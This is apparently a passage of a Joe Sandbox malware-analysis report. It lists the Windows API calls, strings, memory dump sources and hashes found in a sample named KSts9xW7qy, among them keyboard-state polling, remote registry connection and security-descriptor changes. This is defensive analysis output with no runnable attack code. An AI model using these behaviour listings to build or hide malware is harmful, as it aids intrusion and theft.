                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EFD9BC,?), ref: 00EDE7D5
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EDE7E5
                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00EDE809
                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00EDE834
                                                                        • DeleteObject.GDI32(00000000), ref: 00EDE85C
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EDE872
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3840717409-0
                                                                        • Opcode ID: 3a04d72e4fb58082d8b1a47ceb050c0aca730e99191b073b368abe246ecb4554
                                                                        • Instruction ID: e8d97edd6e8591e353b4ad806ea67b44a0199916c7b356168f76dc69267c6e57
                                                                        • Opcode Fuzzy Hash: 3a04d72e4fb58082d8b1a47ceb050c0aca730e99191b073b368abe246ecb4554
                                                                        • Instruction Fuzzy Hash: 8D413675600208AFDB11AF66DC8CEAE7BBAEB89715F108059F906AA360C7309945DB60
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 00EC076F
                                                                        • _wcscat.LIBCMT ref: 00EC0787
                                                                        • _wcscat.LIBCMT ref: 00EC0799
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EC07AE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC07C2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00EC07DA
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EC07F4
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0806
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                        • String ID: *.*
                                                                        • API String ID: 34673085-438819550
                                                                        • Opcode ID: 10e5e335df6845ffba23bed802eb148a8653b584408b5d83efdcd399faa534f7
                                                                        • Instruction ID: c352af42980a5d5741fab291ea201272f90548f5880b9766575df92ae51945e2
                                                                        • Opcode Fuzzy Hash: 10e5e335df6845ffba23bed802eb148a8653b584408b5d83efdcd399faa534f7
                                                                        • Instruction Fuzzy Hash: 28818171504301DFCB24EF64C945EAEB7E8AFC8308F14982EF989E7251E731D9568B92
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EDEF3B
                                                                        • GetFocus.USER32 ref: 00EDEF4B
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00EDEF56
                                                                        • _memset.LIBCMT ref: 00EDF081
                                                                        • GetMenuItemInfoW.USER32 ref: 00EDF0AC
                                                                        • GetMenuItemCount.USER32(00000000), ref: 00EDF0CC
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00EDF0DF
                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00EDF113
                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00EDF15B
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EDF193
                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EDF1C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1296962147-4108050209
                                                                        • Opcode ID: fc99f644b4c999172b94e51d308b65aee85e1267a80a4afed764d830a4a913fd
                                                                        • Instruction ID: 76d6a0096e31286d58992850c225d68568cebff6f8e9cb636d60820687ba787b
                                                                        • Opcode Fuzzy Hash: fc99f644b4c999172b94e51d308b65aee85e1267a80a4afed764d830a4a913fd
                                                                        • Instruction Fuzzy Hash: BF817B70609311EFD710DF15C884A6BBBE9FB88318F00552EF999A7392D770D906CB92
                                                                        APIs
                                                                          • Part of subcall function 00EAABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EAABD7
                                                                          • Part of subcall function 00EAABBB: GetLastError.KERNEL32(?,00EAA69F,?,?,?), ref: 00EAABE1
                                                                          • Part of subcall function 00EAABBB: GetProcessHeap.KERNEL32(00000008,?,?,00EAA69F,?,?,?), ref: 00EAABF0
                                                                          • Part of subcall function 00EAABBB: HeapAlloc.KERNEL32(00000000,?,00EAA69F,?,?,?), ref: 00EAABF7
                                                                          • Part of subcall function 00EAABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EAAC0E
                                                                          • Part of subcall function 00EAAC56: GetProcessHeap.KERNEL32(00000008,00EAA6B5,00000000,00000000,?,00EAA6B5,?), ref: 00EAAC62
                                                                          • Part of subcall function 00EAAC56: HeapAlloc.KERNEL32(00000000,?,00EAA6B5,?), ref: 00EAAC69
                                                                          • Part of subcall function 00EAAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EAA6B5,?), ref: 00EAAC7A
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EAA8CB
                                                                        • _memset.LIBCMT ref: 00EAA8E0
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EAA8FF
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00EAA910
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00EAA94D
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EAA969
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00EAA986
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EAA995
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00EAA99C
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EAA9BD
                                                                        • CopySid.ADVAPI32(00000000), ref: 00EAA9C4
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EAA9F5
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EAAA1B
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EAAA2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00EC9E36
                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EC9E42
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00EC9E4E
                                                                        • SelectObject.GDI32(00000000,?), ref: 00EC9E5B
                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EC9EAF
                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00EC9EEB
                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EC9F0F
                                                                        • SelectObject.GDI32(00000006,?), ref: 00EC9F17
                                                                        • DeleteObject.GDI32(?), ref: 00EC9F20
                                                                        • DeleteDC.GDI32(00000006), ref: 00EC9F27
                                                                        • ReleaseDC.USER32(00000000,?), ref: 00EC9F32
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID: (
                                                                        • API String ID: 2598888154-3887548279
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2889450990-2391861430
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2889450990-3420473620
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB55D7
                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00EB5664
                                                                        • GetMenuItemCount.USER32(00F31708), ref: 00EB56ED
                                                                        • DeleteMenu.USER32(00F31708,00000005,00000000,000000F5,?,?), ref: 00EB577D
                                                                        • DeleteMenu.USER32(00F31708,00000004,00000000), ref: 00EB5785
                                                                        • DeleteMenu.USER32(00F31708,00000006,00000000), ref: 00EB578D
                                                                        • DeleteMenu.USER32(00F31708,00000003,00000000), ref: 00EB5795
                                                                        • GetMenuItemCount.USER32(00F31708), ref: 00EB579D
                                                                        • SetMenuItemInfoW.USER32(00F31708,00000004,00000000,00000030), ref: 00EB57D3
                                                                        • GetCursorPos.USER32(?), ref: 00EB57DD
                                                                        • SetForegroundWindow.USER32(00000000), ref: 00EB57E6
                                                                        • TrackPopupMenuEx.USER32(00F31708,00000000,?,00000000,00000000,00000000), ref: 00EB57F9
                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EB5805
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 3993528054-0
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EAA1DC
                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EAA211
                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EAA22D
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EAA249
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EAA273
                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00EAA29B
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EAA2A6
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EAA2AB
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 1687751970-22481851
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EE36F4,00000010,?,Bad directive syntax error,00F0DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00EB25D6
                                                                        • LoadStringW.USER32(00000000,?,00EE36F4,00000010), ref: 00EB25DD
                                                                        • _wprintf.LIBCMT ref: 00EB2610
                                                                        • __swprintf.LIBCMT ref: 00EB2632
                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EB26A1
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 1080873982-4153970271
                                                                        APIs
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EB7B42
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EB7B58
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EB7B69
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EB7B7B
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EB7B8C
                                                                        Similarity
                                                                        • API ID: SendString
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 890592661-1007645807
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00EB7794
                                                                          • Part of subcall function 00E8DC38: timeGetTime.WINMM(?,75C0B400,00EE58AB), ref: 00E8DC3C
                                                                        • Sleep.KERNEL32(0000000A), ref: 00EB77C0
                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00EB77E4
                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00EB7806
                                                                        • SetActiveWindow.USER32 ref: 00EB7825
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EB7833
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EB7852
                                                                        • Sleep.KERNEL32(000000FA), ref: 00EB785D
                                                                        • IsWindow.USER32 ref: 00EB7869
                                                                        • EndDialog.USER32(00000000), ref: 00EB787A
                                                                        Similarity
                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1194449130-3405671355
                                                                        • Opcode ID: 4bf695c97b2cfa48b5f1fe4439806e229a049e562a1b9c583303bfb4eaaef1f3
                                                                        • Instruction ID: 80d66eca4143cf55526db4579d4d8d5736f7d8f400f1cfcefe22838e1c7625da
                                                                        • Opcode Fuzzy Hash: 4bf695c97b2cfa48b5f1fe4439806e229a049e562a1b9c583303bfb4eaaef1f3
                                                                        • Instruction Fuzzy Hash: DA214FB0208209AFE7059B21EC89BB73F6BFB84769B005015F546B25B2DF759D08EB61
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • CoInitialize.OLE32(00000000), ref: 00EC034B
                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EC03DE
                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00EC03F2
                                                                        • CoCreateInstance.OLE32(00EFDA8C,00000000,00000001,00F23CF8,?), ref: 00EC043E
                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EC04AD
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00EC0505
                                                                        • _memset.LIBCMT ref: 00EC0542
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00EC057E
                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EC05A1
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00EC05A8
                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EC05DF
                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00EC05E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                        • String ID:
                                                                        • API String ID: 1246142700-0
                                                                        • Opcode ID: 722d3014c36d3dd532e3a3a18d0a78decf69c5950f7e30c810e0b67e5882cdcf
                                                                        • Instruction ID: 0f1e3de778f7425953907c7c989cf34d51460e44c1d64240595deb6b3ea525ae
                                                                        • Opcode Fuzzy Hash: 722d3014c36d3dd532e3a3a18d0a78decf69c5950f7e30c810e0b67e5882cdcf
                                                                        • Instruction Fuzzy Hash: 35B1D975A00209AFDB14DFA4C988EAEBBF9FF88304B149459F909EB251D731ED45CB50
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00EB2ED6
                                                                        • SetKeyboardState.USER32(?), ref: 00EB2F41
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00EB2F61
                                                                        • GetKeyState.USER32(000000A0), ref: 00EB2F78
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00EB2FA7
                                                                        • GetKeyState.USER32(000000A1), ref: 00EB2FB8
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00EB2FE4
                                                                        • GetKeyState.USER32(00000011), ref: 00EB2FF2
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00EB301B
                                                                        • GetKeyState.USER32(00000012), ref: 00EB3029
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00EB3052
                                                                        • GetKeyState.USER32(0000005B), ref: 00EB3060
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 74a988d029487bcdbdcfcb11d16f7af9ba8e42d636887cb9ae880949c116597c
                                                                        • Instruction ID: 45498b1c5d8460ee0b17c5ec12a524c9a78a02ffe4e6de4053c86ded57572a03
                                                                        • Opcode Fuzzy Hash: 74a988d029487bcdbdcfcb11d16f7af9ba8e42d636887cb9ae880949c116597c
                                                                        • Instruction Fuzzy Hash: B351CB60A0878429FB36EBB488517EBBFF45F11348F08559DD6C27A1C3DA549B4CC7A2
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00EAED1E
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00EAED30
                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EAED8E
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00EAED99
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00EAEDAB
                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EAEE01
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00EAEE0F
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00EAEE20
                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EAEE63
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00EAEE71
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EAEE8E
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EAEE9B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: 3752533d4c84de326b7d578d1bcbec7ed9b0710ecc1bc415e5ad3c9a0126eb97
                                                                        • Instruction ID: 3e5dd8a17882cc5708b2aa63d86bc8e327bb95d2384ec6a98f87ecd4007bc2fd
                                                                        • Opcode Fuzzy Hash: 3752533d4c84de326b7d578d1bcbec7ed9b0710ecc1bc415e5ad3c9a0126eb97
                                                                        • Instruction Fuzzy Hash: 3B512171B00205AFDB18CF69CD89AAEBBBAEB88304F158129F519E7290D770AD04CB10
                                                                        APIs
                                                                          • Part of subcall function 00E8B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E8B759,?,00000000,?,?,?,?,00E8B72B,00000000,?), ref: 00E8BA58
                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E8B72B), ref: 00E8B7F6
                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00E8B72B,00000000,?,?,00E8B2EF,?,?), ref: 00E8B88D
                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00EED8A6
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E8B72B,00000000,?,?,00E8B2EF,?,?), ref: 00EED8D7
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E8B72B,00000000,?,?,00E8B2EF,?,?), ref: 00EED8EE
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E8B72B,00000000,?,?,00E8B2EF,?,?), ref: 00EED90A
                                                                        • DeleteObject.GDI32(00000000), ref: 00EED91C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 641708696-0
                                                                        • Opcode ID: 144f8ce0ff173d788a579bc654d146d1925718abce0f79cdf563f9813bfc73ad
                                                                        • Instruction ID: 975cd21b3cdc4bf72078ce4f9236e93af60e5a8842fb6433648ecc34f7b6cd8d
                                                                        • Opcode Fuzzy Hash: 144f8ce0ff173d788a579bc654d146d1925718abce0f79cdf563f9813bfc73ad
                                                                        • Instruction Fuzzy Hash: C061AD30504744CFDB29AF56DC89B75BBF6FB9432AF14251AE04EA6A70CB71A890DF40
                                                                        APIs
                                                                          • Part of subcall function 00E8B526: GetWindowLongW.USER32(?,000000EB), ref: 00E8B537
                                                                        • GetSysColor.USER32(0000000F), ref: 00E8B438
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ColorLongWindow
                                                                        • String ID:
                                                                        • API String ID: 259745315-0
                                                                        • Opcode ID: 198747badb68c2eb358f57ea0174580cc6c0fd12f703c743a7c8147ecce7f606
                                                                        • Instruction ID: e92a3cca81e2e765d735bf72d7a5bda4c17bc606d3498e9dc1a1bdde4d18100b
                                                                        • Opcode Fuzzy Hash: 198747badb68c2eb358f57ea0174580cc6c0fd12f703c743a7c8147ecce7f606
                                                                        • Instruction Fuzzy Hash: 1541CF30005144AFDB206F29DC8ABB93B66AB46735F185261FD7DBE1E2E7308C42DB21
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 136442275-0
                                                                        • Opcode ID: 4acd2cd71df3751219b85893f29bd274d274088e509a9e7e7bdcfbb52339aa5e
